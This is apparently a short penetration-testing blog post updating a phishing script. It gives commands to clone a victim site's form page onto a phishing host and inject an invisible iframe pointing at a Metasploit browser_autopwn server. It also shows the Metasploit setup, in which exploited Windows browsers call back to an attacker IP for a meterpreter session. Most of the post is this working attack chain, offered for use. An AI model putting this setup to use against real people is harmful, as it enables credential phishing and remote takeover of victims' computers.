Adventures in Penetration Testing: Let’s Go Phishing – Update

Please see the original article for more information about this phishing script. This is just a minor update to some functionality that I added over the weekend. I haven’t hooked BeEF in yet, but I have added Metasploit, which can be nice.

The updated version, which can be found here, can be tied into Metasploit’s browser_autopwn module. For more information about the module, see a good little write up here.

I’ve added an option that will add an invisible iframe to the bottom of whatever page you are phishing that points to whatever IP or FQDN on which you want to run the browser_autopwn module.


  python --phish https://<victimsite>/path/to/form/page 
    --replace https://<phishinghost> --port 443 --ssl \ 
    --sslcert ssl.crt --sslkey ssl.key --sslchain chain.crt \
    --autopwn http://<MetasploitAutopwnHost>/<autopwnuri>

The setup on the Metasploit host would be:

  use auxiliary/server/browser_autopwn
  set SRVHOST <AttackerIP>
  set SRVPORT 80
  set URIPATH /
  set LPORT_WIN32 443

This will start up the listener on port 80, running on whatever IP you set as <AttackerIP>, with a URI of ‘/’, and any successful Windows exploits will call back to your <AttackerIP> on port 443 to establish a meterpreter session.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: